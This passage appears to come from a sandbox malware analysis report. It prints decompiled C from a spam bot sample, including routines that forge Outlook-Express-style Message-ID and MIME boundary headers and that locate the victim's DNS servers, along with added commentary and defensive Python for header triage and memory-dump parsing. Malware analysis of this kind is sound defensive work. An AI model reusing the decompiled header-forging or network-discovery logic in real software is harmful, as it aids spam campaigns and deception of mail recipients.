                                                                                											__eflags =  *_t63;
                                                                                										} else {
                                                                                											_v8 =  &_v364;
                                                                                										}
                                                                                										_t122 = E00126CAD(_v8);
                                                                                										__eflags = _t122;
                                                                                										if(_t122 != 0) {
                                                                                											asm("popad");
                                                                                											asm("popad");
                                                                                											asm("popad");
                                                                                											asm("popad");
                                                                                											_push(0x8b00007e);
                                                                                											asm("lock xor esi, 0x55555555");
                                                                                											_v16 = 0x1322f8;
                                                                                											_t166 = 0xad;
                                                                                											_t123 = E00126C96(0x1322f8);
                                                                                											__eflags = _t123;
                                                                                											if(_t123 != 0) {
                                                                                												L57:
                                                                                												RegCloseKey(_v12);
                                                                                												__eflags = _a16;
                                                                                												if(_a16 != 0) {
                                                                                													E0012EF00(_a16,  &_v64);
                                                                                												}
                                                                                												_t125 = 0;
                                                                                												__eflags = _v20;
                                                                                												 *_t196 = 0x2e;
                                                                                												goto L34;
                                                                                											}
                                                                                											_t71 = _t166 - 0x40; // 0x1322b8
                                                                                											__eflags = _t71 - 0x3f;
                                                                                											if(_t71 > 0x3f) {
                                                                                												goto L57;
                                                                                											}
                                                                                											__eflags = 0xf8 - 0x10;
                                                                                											if(0xf8 >= 0x10) {
                                                                                												goto L57;
                                                                                											}
                                                                                											_t202 = _a12;
                                                                                											 *_t196 = 0x2e;
                                                                                											__eflags = _t202;
                                                                                											if(_t202 != 0) {
                                                                                												_t136 = GetFileAttributesExA( &_v364, 0,  &_v400);
                                                                                												__eflags = _t136;
                                                                                												if(_t136 != 0) {
                                                                                													 *_t202 = 1;
                                                                                												}
                                                                                											}
                                                                                											_t130 = _a8;
                                                                                											__eflags = _t130;
                                                                                											if(_t130 != 0) {
                                                                                												 *_t130 = _t166;
                                                                                											}
                                                                                											__eflags = _a16;
                                                                                											if(_a16 != 0) {
                                                                                												E0012EF00(_a16,  &_v64);
                                                                                											}
                                                                                											__eflags = _a20;
                                                                                											if(_a20 != 0) {
                                                                                												E0012EF00(_a20, _v8);
                                                                                											}
                                                                                											_t125 = 0;
                                                                                											__eflags = _v20;
                                                                                											goto L34;
                                                                                										} else {
                                                                                											RegCloseKey(_v12);
                                                                                											__eflags = _a16;
                                                                                											if(_a16 != 0) {
                                                                                												E0012EF00(_a16,  &_v64);
                                                                                											}
                                                                                											 *_t196 = 0x2e;
                                                                                											goto L33;
                                                                                										}
                                                                                									}
                                                                                									RegCloseKey(_v12);
                                                                                									_t96 = 0;
                                                                                									goto L22;
                                                                                								} else {
                                                                                									RegCloseKey(_v12);
                                                                                									__eflags = _a16;
                                                                                									if(_a16 != 0) {
                                                                                										E0012EF00(_a16,  &_v64);
                                                                                									}
                                                                                									L33:
                                                                                									_t125 = 0;
                                                                                									__eflags = _v20;
                                                                                									L34:
                                                                                									_t96 = (_t125 & 0xffffff00 | __eflags == 0x00000000) + 1;
                                                                                									L22:
                                                                                									return _t96;
                                                                                								}
                                                                                							}
                                                                                							RegCloseKey(_v12);
                                                                                							__eflags = _a16;
                                                                                							if(_a16 != 0) {
                                                                                								E0012EF00(_a16,  &_v64);
                                                                                							}
                                                                                							_t96 = 1;
                                                                                							goto L22;
                                                                                						}
                                                                                						_t155 = E00126CAD( &_v64);
                                                                                						_pop(_t167);
                                                                                						__eflags = _t155;
                                                                                						if(_t155 == 0) {
                                                                                							L17:
                                                                                							E0012EE2A(_t167, 0x1322f8, 0, 0x100);
                                                                                							_t204 = _t206 + 0xc;
                                                                                							goto L18;
                                                                                						}
                                                                                						_t158 = E0012F1A5( &_v64);
                                                                                						_t167 = _v32 ^ 0x61616161;
                                                                                						__eflags = _t158 - (_v32 ^ 0x61616161);
                                                                                						if(_t158 == (_v32 ^ 0x61616161)) {
                                                                                							goto L23;
                                                                                						}
                                                                                						goto L17;
                                                                                					}
                                                                                					RegCloseKey(_v12);
                                                                                					goto L21;
                                                                                				}
                                                                                			}
                                                                                0x00127055
                                                                                0x00127058
                                                                                0x0012705a
                                                                                0x00127061
                                                                                0x00127068
                                                                                0x00127071
                                                                                0x00127073
                                                                                0x00127073
                                                                                0x00127075
                                                                                0x0012707a
                                                                                0x0012707c
                                                                                0x0012707c
                                                                                0x0012707e
                                                                                0x00127083
                                                                                0x00127085
                                                                                0x00127085
                                                                                0x00127087
                                                                                0x0012708c
                                                                                0x0012708e
                                                                                0x0012708e
                                                                                0x001270b4
                                                                                0x001270b9
                                                                                0x001270ca
                                                                                0x001271b8
                                                                                0x001271c8
                                                                                0x00000000
                                                                                0x001270d0
                                                                                0x001270d0
                                                                                0x001270d8
                                                                                0x001270df
                                                                                0x001270e3
                                                                                0x001270e4
                                                                                0x001270e9
                                                                                0x001270ed
                                                                                0x001270ee
                                                                                0x001270f1
                                                                                0x001270f2
                                                                                0x001270f5
                                                                                0x0012719b
                                                                                0x0012719e
                                                                                0x001271a9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x001270fb
                                                                                0x001270fd
                                                                                0x0012716e
                                                                                0x0012716e
                                                                                0x0012716e
                                                                                0x0012716e
                                                                                0x00127174
                                                                                0x0012717b
                                                                                0x0012717f
                                                                                0x00127180
                                                                                0x00127185
                                                                                0x00127189
                                                                                0x0012718a
                                                                                0x0012718d
                                                                                0x00127194
                                                                                0x00000000
                                                                                0x00127194
                                                                                0x001270ff
                                                                                0x00127102
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00127104
                                                                                0x00127107
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00127109
                                                                                0x0012710d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00127123
                                                                                0x00127128
                                                                                0x0012712d
                                                                                0x0012712f
                                                                                0x0012712f
                                                                                0x00127130
                                                                                0x00127133
                                                                                0x001271d0
                                                                                0x001271f4
                                                                                0x001271f7
                                                                                0x001271fc
                                                                                0x001271ff
                                                                                0x00127203
                                                                                0x00127227
                                                                                0x0012722e
                                                                                0x0012723e
                                                                                0x0012724c
                                                                                0x00127251
                                                                                0x00127254
                                                                                0x00127256
                                                                                0x00127258
                                                                                0x00127258
                                                                                0x00127256
                                                                                0x00127280
                                                                                0x00127282
                                                                                0x0012728a
                                                                                0x0012728c
                                                                                0x001272c2
                                                                                0x001272c9
                                                                                0x001272cb
                                                                                0x001272e6
                                                                                0x001272e8
                                                                                0x001272ef
                                                                                0x001272f2
                                                                                0x001272f4
                                                                                0x00127301
                                                                                0x00127301
                                                                                0x00127301
                                                                                0x001272f6
                                                                                0x001272fc
                                                                                0x001272fc
                                                                                0x00127307
                                                                                0x0012730d
                                                                                0x0012730f
                                                                                0x00127335
                                                                                0x00127336
                                                                                0x00127337
                                                                                0x00127338
                                                                                0x00127339
                                                                                0x0012733e
                                                                                0x0012734b
                                                                                0x0012734e
                                                                                0x00127354
                                                                                0x0012735b
                                                                                0x0012735d
                                                                                0x001273d5
                                                                                0x001273d8
                                                                                0x001273de
                                                                                0x001273e2
                                                                                0x001273eb
                                                                                0x001273f1
                                                                                0x001273f2
                                                                                0x001273f4
                                                                                0x001273f7
                                                                                0x00000000
                                                                                0x001273f7
                                                                                0x0012735f
                                                                                0x00127362
                                                                                0x00127365
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012736d
                                                                                0x00127370
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00127372
                                                                                0x00127375
                                                                                0x0012737a
                                                                                0x0012737c
                                                                                0x0012738d
                                                                                0x00127393
                                                                                0x00127395
                                                                                0x00127397
                                                                                0x00127397
                                                                                0x00127395
                                                                                0x0012739d
                                                                                0x001273a0
                                                                                0x001273a2
                                                                                0x001273a4
                                                                                0x001273a4
                                                                                0x001273a6
                                                                                0x001273a9
                                                                                0x001273b2
                                                                                0x001273b8
                                                                                0x001273b9
                                                                                0x001273bc
                                                                                0x001273c4
                                                                                0x001273ca
                                                                                0x001273cb
                                                                                0x001273cd
                                                                                0x00000000
                                                                                0x00127311
                                                                                0x00127314
                                                                                0x0012731a
                                                                                0x0012731d
                                                                                0x00127326
                                                                                0x0012732c
                                                                                0x0012732d
                                                                                0x00000000
                                                                                0x0012732d
                                                                                0x0012730f
                                                                                0x001272d0
                                                                                0x001272d6
                                                                                0x00000000
                                                                                0x0012728e
                                                                                0x00127291
                                                                                0x00127297
                                                                                0x0012729a
                                                                                0x001272a3
                                                                                0x001272a9
                                                                                0x001272aa
                                                                                0x001272aa
                                                                                0x001272ac
                                                                                0x001272af
                                                                                0x001272b2
                                                                                0x001271cb
                                                                                0x001271cf
                                                                                0x001271cf
                                                                                0x0012728c
                                                                                0x00127208
                                                                                0x0012720e
                                                                                0x00127212
                                                                                0x0012721b
                                                                                0x00127221
                                                                                0x00127224
                                                                                0x00000000
                                                                                0x00127224
                                                                                0x0012713d
                                                                                0x00127142
                                                                                0x00127143
                                                                                0x00127145
                                                                                0x0012715e
                                                                                0x00127166
                                                                                0x0012716b
                                                                                0x00000000
                                                                                0x0012716b
                                                                                0x0012714b
                                                                                0x00127154
                                                                                0x0012715a
                                                                                0x0012715c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012715c
                                                                                0x001271b2
                                                                                0x00000000
                                                                                0x001271b2

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000101,74CB43E0,?,74CB43E0,00000000), ref: 001270C2
                                                                                • RegEnumValueA.ADVAPI32(74CB43E0,00000000,?,00000020,00000000,00000000,00000000,0000012C,?,74CB43E0,00000000), ref: 0012719E
                                                                                • RegCloseKey.ADVAPI32(74CB43E0,?,74CB43E0,00000000), ref: 001271B2
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 00127208
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 00127291
                                                                                • ___ascii_stricmp.LIBCMT ref: 001272C2
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 001272D0
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 00127314
                                                                                • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0012738D
                                                                                • RegCloseKey.ADVAPI32(74CB43E0), ref: 001273D8
                                                                                  • Part of subcall function 0012F1A5: lstrlenA.KERNEL32(000000C8,000000E4,001322F8,000000C8,00127150,?), ref: 0012F1AD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close$AttributesEnumFileOpenValue___ascii_stricmplstrlen
                                                                                • String ID: $"
                                                                                • API String ID: 4293430545-3817095088
                                                                                • Opcode ID: 828b45611bfdc9fa52056eba0fa4aa6da0c732ee775372c3d438b8b136af6b01
                                                                                • Instruction ID: 5ecefecf41aee9d7550f61338a4c938fea0d47738e1d462710213283eed14ee0
                                                                                • Opcode Fuzzy Hash: 828b45611bfdc9fa52056eba0fa4aa6da0c732ee775372c3d438b8b136af6b01
                                                                                • Instruction Fuzzy Hash: 4CB18E72908229EEDF15EFA4EC45AEF77B8EF15310F200466F501E60D1EB719AA4CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E0012AD89(void* __ecx, void* __eflags) {
                                                                                				signed int _t48;
                                                                                				signed int _t50;
                                                                                				void* _t53;
                                                                                				intOrPtr _t55;
                                                                                				void* _t76;
                                                                                				signed int _t77;
                                                                                				void* _t81;
                                                                                				CHAR* _t92;
                                                                                				void* _t94;
                                                                                				void* _t96;
                                                                                				void* _t98;
                                                                                
                                                                                				_t76 = __ecx;
                                                                                				_t94 = _t96 - 0x74;
                                                                                				GetLocalTime(_t94 + 0x50);
                                                                                				SystemTimeToFileTime(_t94 + 0x50, _t94 + 0x64);
                                                                                				E0012EE2A(_t76, _t94 - 0x110, 0, 0x80);
                                                                                				E0012AD08(_t94 - 0x110);
                                                                                				_t98 = _t96 - 0x184 + 0x10;
                                                                                				if(E001230B5() == 0) {
                                                                                					 *((intOrPtr*)(_t94 + 0x6c)) = "127.0.0.1";
                                                                                				} else {
                                                                                					_push(_t94 - 0x90);
                                                                                					 *((intOrPtr*)(_t94 + 0x6c)) = E0012A7A3(_t47, _t47);
                                                                                				}
                                                                                				_t48 = E0012ECA5();
                                                                                				_t77 = 0xe;
                                                                                				_t50 = E0012ECA5();
                                                                                				_t92 = "%OUTLOOK_BND_";
                                                                                				 *((intOrPtr*)(_t94 + 0x70)) = (_t50 & 0x00000001) + _t48 % _t77 + 0xb;
                                                                                				_t53 = E0012EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
                                                                                				while(1) {
                                                                                					_t103 = _t53;
                                                                                					if(_t53 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					_t55 = E0012EDAC(_t53 + 0xd);
                                                                                					_t81 =  *((intOrPtr*)(_t94 + 0x70)) + _t55;
                                                                                					__eflags = _t81;
                                                                                					 *((intOrPtr*)(_t94 + 0x60)) = _t55;
                                                                                					wsprintfA(_t94 - 0x70, "----=_NextPart_%03d_%04X_%08.8lX.%08.8lX", _t55, _t81,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64));
                                                                                					wsprintfA(_t94 + 0x10, "%s%d", _t92,  *((intOrPtr*)(_t94 + 0x60)));
                                                                                					E0012EF7C(__eflags,  *((intOrPtr*)(_t94 + 0x7c)), _t94 + 0x10, _t94 - 0x70, 0x3e800, 0);
                                                                                					_t98 = _t98 + 0x40;
                                                                                					_t53 = E0012EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
                                                                                				}
                                                                                				wsprintfA(_t94 - 0x70, "%04x%08.8lx$%08.8lx$%08x@%s",  *((intOrPtr*)(_t94 + 0x70)) + 3,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64),  *((intOrPtr*)(_t94 + 0x6c)), _t94 - 0x110);
                                                                                				E0012EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_MID", _t94 - 0x70, 0x3e800, 0);
                                                                                				return E0012EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_HST", _t94 - 0x110, 0x3e800, 0);
                                                                                			}

                                                                                 Instruction address column for the C-code above (IDA plugin output, 0x0012ad89 to 0x0012aedc); the flattened layout lost the per-line mapping, so the column is collapsed here.

                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 0012AD98
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0012ADA6
                                                                                  • Part of subcall function 0012AD08: gethostname.WS2_32(?,00000080), ref: 0012AD1C
                                                                                  • Part of subcall function 0012AD08: lstrlenA.KERNEL32(?), ref: 0012AD60
                                                                                  • Part of subcall function 0012AD08: lstrlenA.KERNEL32(?), ref: 0012AD69
                                                                                  • Part of subcall function 0012AD08: lstrcpyA.KERNEL32(?,LocalHost), ref: 0012AD7F
                                                                                  • Part of subcall function 001230B5: gethostname.WS2_32(?,00000080), ref: 001230D8
                                                                                  • Part of subcall function 001230B5: gethostbyname.WS2_32(?), ref: 001230E2
                                                                                • wsprintfA.USER32 ref: 0012AEA5
                                                                                  • Part of subcall function 0012A7A3: inet_ntoa.WS2_32(00000000), ref: 0012A7A9
                                                                                • wsprintfA.USER32 ref: 0012AE4F
                                                                                • wsprintfA.USER32 ref: 0012AE5E
                                                                                  • Part of subcall function 0012EF7C: lstrlenA.KERNEL32(?,?,00000000,?,?), ref: 0012EF92
                                                                                  • Part of subcall function 0012EF7C: lstrlenA.KERNEL32(?), ref: 0012EF99
                                                                                  • Part of subcall function 0012EF7C: lstrlenA.KERNEL32(00000000), ref: 0012EFA0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, Offset: 00120000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_23_2_120000_svchost.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$Timewsprintf$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
                                                                                • String ID: %04x%08.8lx$%08.8lx$%08x@%s$%OUTLOOK_BND_$%OUTLOOK_HST$%OUTLOOK_MID$%s%d$----=_NextPart_%03d_%04X_%08.8lX.%08.8lX$127.0.0.1
                                                                                • API String ID: 3631595830-1816598006
                                                                                • Opcode ID: 9f6c4ff9ece91ef88c11854328e0ba8fc0be92f2320e634623b2de578e4dd898
                                                                                • Instruction ID: c77c6e0fd21ab560b2c97acfc7f3f885d590d0093a85a1c9c2eaa10683b49b78
                                                                                • Opcode Fuzzy Hash: 9f6c4ff9ece91ef88c11854328e0ba8fc0be92f2320e634623b2de578e4dd898
                                                                                • Instruction Fuzzy Hash: 7A4111B290021CABDF25EFA0DC46EEE7BEDFF18300F144416F91592151E771D9648B51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
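E0012AD89 above is the header-forging step of the sample's spam engine. It takes the local host name (E0012AD08 falls back to "LocalHost" when gethostname fails, and the address falls back to "127.0.0.1"), the current time as a FILETIME, and a counter of rand % 14 + 11 + (rand & 1), i.e. 11 to 25 if E0012ECA5 is the PRNG it appears to be. It then replaces every %OUTLOOK_BND_<n> placeholder in the mail template with a boundary "----=_NextPart_<n>_<counter+n>_<FILETIME.high>.<FILETIME.low>", sets %OUTLOOK_MID to "<counter+3><FILETIME.high>$<FILETIME.low>$<IPv4 dword>@<host>" and %OUTLOOK_HST to the host name. Both forms reproduce what Outlook Express itself emits, so the formats alone do not identify the bot; what can be checked is whether the two headers were derived from one FILETIME and one counter, whether the embedded time agrees with the Date header, and whether the fallback host or loopback address leaked into the Message-ID. The Python below is an added example for that triage, written for this page and not taken from the report or from the sample: it parses both header forms, decodes the FILETIME and the IPv4 dword, and cross-checks them. The sample headers are constructed; the 300-second skew threshold and the reading of the IPv4 field as an in_addr dword (the decompilation leaves the 127.0.0.1 fallback ambiguous) are assumptions.

```python
"""Triage Outlook-Express-style Message-ID and MIME boundary headers of the form E0012AD89 forges."""
import re
from datetime import datetime, timedelta, timezone
from email import message_from_string
from email.utils import parsedate_to_datetime

# Layouts taken from the format strings in the decompiled function:
#   %OUTLOOK_MID   -> "%04x%08.8lx$%08.8lx$%08x@%s"             : counter+3, FILETIME.high, FILETIME.low, IPv4 dword, host
#   %OUTLOOK_BND_n -> "----=_NextPart_%03d_%04X_%08.8lX.%08.8lX" : n, counter+n, FILETIME.high, FILETIME.low
MSGID_RE = re.compile(r"^<?([0-9a-f]{4})([0-9a-f]{8})\$([0-9a-f]{8})\$([0-9a-f]{8})@([^>\s]+)>?$", re.I)
BOUNDARY_RE = re.compile(r"^----=_NextPart_(\d{3})_([0-9a-f]{4})_([0-9a-f]{8})\.([0-9a-f]{8})$", re.I)
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
SAMPLE_COUNTER_RANGE = range(11, 26)   # rand % 14 + 11 + (rand & 1) in E0012AD89 (E0012ECA5 assumed to be a PRNG)
MAX_DATE_SKEW_SECONDS = 300            # assumption: tolerated gap between the Date header and the embedded FILETIME

# Constructed sample (not from the report): fallback host name, loopback IPv4 dword, counter 11, 2023-02-15 10:00 UTC.
SAMPLE_HEADERS = (
    "Date: Wed, 15 Feb 2023 10:00:00 +0000\n"
    "Message-ID: <000e01d94124$4405d000$0100007f@LocalHost>\n"
    "Content-Type: multipart/alternative;\n"
    '\tboundary="----=_NextPart_000_000B_01D94124.4405D000"\n'
    "\n"
)


def filetime_to_datetime(high, low):
    """Split Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=((high << 32) | low) // 10)


def inaddr_to_ip(dword):
    """An in_addr printed with %08x is the little-endian dword, so 127.0.0.1 appears as 0100007f."""
    return ".".join(str(b) for b in dword.to_bytes(4, "little"))


def parse_message_id(value):
    m = MSGID_RE.match(value.strip())
    if not m:
        return None
    counter, high, low, ip, host = m.groups()
    return {"counter": int(counter, 16), "time": filetime_to_datetime(int(high, 16), int(low, 16)),
            "ip": inaddr_to_ip(int(ip, 16)), "host": host}


def parse_boundary(value):
    m = BOUNDARY_RE.match(value.strip())
    if not m:
        return None
    index, counter, high, low = m.groups()
    return {"index": int(index), "counter": int(counter, 16),
            "time": filetime_to_datetime(int(high, 16), int(low, 16))}


def analyze_headers(raw):
    """Return the parsed fields plus a list of findings; only the two base keys for a non-OE Message-ID."""
    msg = message_from_string(raw)
    result = {"oe_message_id": False, "findings": []}
    mid = parse_message_id(msg.get("Message-ID", ""))
    if mid is None:
        return result
    result.update(oe_message_id=True, message_id=mid, base_counter=mid["counter"] - 3)
    if msg.get("Date"):
        skew = abs((parsedate_to_datetime(msg["Date"]) - mid["time"]).total_seconds())
        result["date_skew_seconds"] = skew
        if skew > MAX_DATE_SKEW_SECONDS:
            result["findings"].append("Message-ID FILETIME disagrees with the Date header")
    bnd = parse_boundary(msg.get_boundary() or "")
    if bnd is not None:
        # Outlook Express, and this sample, derive both headers from one FILETIME and one counter.
        consistent = bnd["time"] == mid["time"] and result["base_counter"] == bnd["counter"] - bnd["index"]
        result.update(boundary=bnd, boundary_consistent=consistent)
        if not consistent:
            result["findings"].append("boundary FILETIME/counter not derived from the Message-ID's")
    if mid["host"].lower() == "localhost":
        result["findings"].append("host is the gethostname() fallback 'LocalHost'")
    if mid["ip"] == "127.0.0.1":
        result["findings"].append("IPv4 field is the loopback fallback")
    if result["base_counter"] in SAMPLE_COUNTER_RANGE:
        result["findings"].append("base counter within this sample's 11..25 range (weak: real OE counters overlap it)")
    return result
```

Run analyze_headers over the headers of a suspect message; the findings list is meant as input to a score, not as a verdict, because a genuine Outlook Express client on a misconfigured host produces the same LocalHost and 0100007f values.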

                                                                                C-Code - Quality: 55%
                                                                                			E00122DF2(intOrPtr _a4) {
                                                                                				void* _v8;
                                                                                				signed int _v12;
                                                                                				long _v16;
                                                                                				intOrPtr _v28;
                                                                                				short _v30;
                                                                                				char _v32;
                                                                                				struct HINSTANCE__* _t18;
                                                                                				void* _t22;
                                                                                				signed int _t23;
                                                                                				short _t27;
                                                                                				signed int _t31;
                                                                                				intOrPtr* _t35;
                                                                                				intOrPtr* _t37;
                                                                                				CHAR* _t38;
                                                                                				void* _t40;
                                                                                
                                                                                				_t38 = "iphlpapi.dll";
                                                                                				_t18 = GetModuleHandleA(_t38);
                                                                                				if(_t18 == 0 || _t18 == 0xffffffff) {
                                                                                					_t18 = LoadLibraryA(_t38);
                                                                                				}
                                                                                				if(_t18 == 0 || _t18 == 0xffffffff) {
                                                                                					L18:
                                                                                					return 0;
                                                                                				} else {
                                                                                					_t35 = GetProcAddress(_t18, "GetNetworkParams");
                                                                                					if(_t35 == 0) {
                                                                                						goto L18;
                                                                                					}
                                                                                					_t22 = HeapAlloc(GetProcessHeap(), 0, 0x4000);
                                                                                					_t33 =  &_v16;
                                                                                					_v8 = _t22;
                                                                                					_v16 = 0x4000;
                                                                                					_t23 =  *_t35(_t22,  &_v16);
                                                                                					if(_t23 != 0) {
                                                                                						goto L18;
                                                                                					}
                                                                                					_v12 = _v12 & _t23;
                                                                                					_t37 = _v8 + 0x10c;
                                                                                					if(_t37 == 0) {
                                                                                						L17:
                                                                                						HeapFree(GetProcessHeap(), 0, _v8);
                                                                                						return _v12;
                                                                                					} else {
                                                                                						goto L8;
                                                                                					}
                                                                                					do {
                                                                                						L8:
                                                                                						_t40 = _t37 + 4;
                                                                                						if(_t40 == 0) {
                                                                                							goto L16;
                                                                                						}
                                                                                						_t27 = 2;
                                                                                						_v32 = _t27;
                                                                                						__imp__#9(0x35);
                                                                                						_v30 = _t27;
                                                                                						__imp__#11(_t40);
                                                                                						_v28 = _t27;
                                                                                						if(_t27 == 0 || _t27 == 0xffffffff) {
                                                                                							__imp__#52(_t40);
                                                                                							if(_t27 == 0) {
                                                                                								goto L16;
                                                                                							}
                                                                                							_t27 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xc))))));
                                                                                							_v28 = _t27;
                                                                                							goto L13;
                                                                                						} else {
                                                                                							L13:
                                                                                							if(_t27 != 0 && _t27 != 0xffffffff) {
                                                                                								_t31 = E00122CEB(_t33,  &_v32, _a4);
                                                                                								_pop(_t33);
                                                                                								_v12 = _t31;
                                                                                								if(_t31 != 0) {
                                                                                									goto L17;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						L16:
                                                                                						_t37 =  *_t37;
                                                                                					} while (_t37 != 0);
                                                                                					goto L17;
                                                                                				}
                                                                                			}
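E00122DF2 above resolves GetNetworkParams from iphlpapi.dll at run time, allocates a 0x4000-byte buffer for the FIXED_INFO it returns, and walks DnsServerList starting at offset 0x10c (each IP_ADDR_STRING is a Next pointer followed by the 16-byte dotted-quad string). For every configured DNS server it builds a sockaddr_in with sin_family = AF_INET (2), sin_port = htons(0x35) = 53 and sin_addr = inet_addr(string), falling back to gethostbyname when inet_addr fails (WS2_32 ordinals 9, 11 and 52 are htons, inet_addr and gethostbyname), and hands it to E00122CEB together with the caller's argument, returning on the first server for which that call succeeds. In short, the bot locates the victim's own resolvers before doing its DNS work. The Python below is an added example for the forensic side of that, not code from the report or from the sample: it lays out FIXED_INFO and the IP_ADDR_STRING chain in a constructed dump at an assumed base address (the extra entries follow the struct in the same buffer, as GetNetworkParams places them), walks the chain the way the function does but with a bounds check the malware lacks, and assembles the same sockaddr_in bytes. The base address and the server addresses are made up; the 0x248 struct size comes from the public iphlpapi.h layout for 32-bit code.

```python
"""Walk the DnsServerList that GetNetworkParams fills in, the way E00122DF2 does, out of a memory dump."""
import socket
import struct

# Offsets from the public 32-bit iphlpapi.h layout of FIXED_INFO / IP_ADDR_STRING.
FIXED_INFO_DNS_SERVER_LIST = 0x10C   # FIXED_INFO.DnsServerList, the offset the decompiled code adds to the buffer
IP_ADDR_STRING_SIZE = 40             # Next (4) + IpAddress (16) + IpMask (16) + Context (4)
FIXED_INFO_SIZE = 0x248              # additional list entries follow the struct inside the same buffer
BUFFER_SIZE = 0x4000                 # the allocation size the sample passes to GetNetworkParams


def build_fixed_info(base, servers):
    """Construct a FIXED_INFO buffer as it would sit in memory at address `base` (test data, not a real dump)."""
    buf = bytearray(BUFFER_SIZE)
    entry_off = FIXED_INFO_DNS_SERVER_LIST
    spill_off = FIXED_INFO_SIZE
    for i, ip in enumerate(servers):
        next_ptr = base + spill_off if i + 1 < len(servers) else 0
        struct.pack_into("<I16s16sI", buf, entry_off, next_ptr, ip.encode("ascii"), b"255.255.255.255", 0)
        entry_off, spill_off = spill_off, spill_off + IP_ADDR_STRING_SIZE
    return bytes(buf)


def walk_dns_servers(buf, base, max_entries=64):
    """Follow Next pointers from DnsServerList as the sample does (buf+0x10c, then *Next), bounds-checked."""
    servers = []
    off = FIXED_INFO_DNS_SERVER_LIST
    while len(servers) < max_entries:
        if off < 0 or off + IP_ADDR_STRING_SIZE > len(buf):
            break                        # pointer leaves the dump (wrong base or corrupt list): stop, don't read garbage
        next_ptr, ip_raw = struct.unpack_from("<I16s", buf, off)
        ip = ip_raw.split(b"\0", 1)[0].decode("ascii", "replace")
        if ip:
            servers.append(ip)
        if next_ptr == 0:
            break
        off = next_ptr - base            # translate the in-memory pointer back to a dump offset
    return servers


def build_sockaddr_in_dns(ip):
    """The sockaddr_in E00122DF2 passes to E00122CEB: sin_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr(ip)."""
    return struct.pack("<H", 2) + struct.pack("!H", 53) + socket.inet_aton(ip) + bytes(8)


if __name__ == "__main__":
    base = 0x00560000                    # assumed address of the heap block in the dump
    dump = build_fixed_info(base, ["10.0.0.53", "192.168.1.1"])
    for server in walk_dns_servers(dump, base):
        print(server, build_sockaddr_in_dns(server).hex())
```

When applied to a real process dump, `base` is the address HeapAlloc returned (visible in the call trace or recoverable from the _v8 slot), and the walk stops cleanly if that address is wrong instead of dereferencing stale pointers.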

                                                                                0x00122dfb
                                                                                0x00122e01
                                                                                0x00122e09
                                                                                0x00122e11
                                                                                0x00122e11
                                                                                0x00122e19
                                                                                0x00122ef1
                                                                                0x00000000
                                                                                0x00122e28
                                                                                0x00122e34
                                                                                0x00122e38
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122e4f
                                                                                0x00122e55
                                                                                0x00122e5a
                                                                                0x00122e5d
                                                                                0x00122e60
                                                                                0x00122e64
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122e6d
                                                                                0x00122e70
                                                                                0x00122e76
                                                                                0x00122ede
                                                                                0x00122ee6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122e78
                                                                                0x00122e78
                                                                                0x00122e78
                                                                                0x00122e7d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122e81
                                                                                0x00122e84
                                                                                0x00122e88
                                                                                0x00122e8f
                                                                                0x00122e93
                                                                                0x00122e99
                                                                                0x00122e9e
                                                                                0x00122ea6
                                                                                0x00122eae
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122eb5
                                                                                0x00122eb7
                                                                                0x00000000
                                                                                0x00122eba
                                                                                0x00122eba
                                                                                0x00122ebc
                                                                                0x00122eca
                                                                                0x00122ed0
                                                                                0x00122ed1
                                                                                0x00122ed6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00122ed6
                                                                                0x00122ebc
                                                                                0x00122ed8
                                                                                0x00122ed8
                                                                                0x00122eda
                                                                                0x00000000
                                                                                0x00122e78

                                                                                APIs
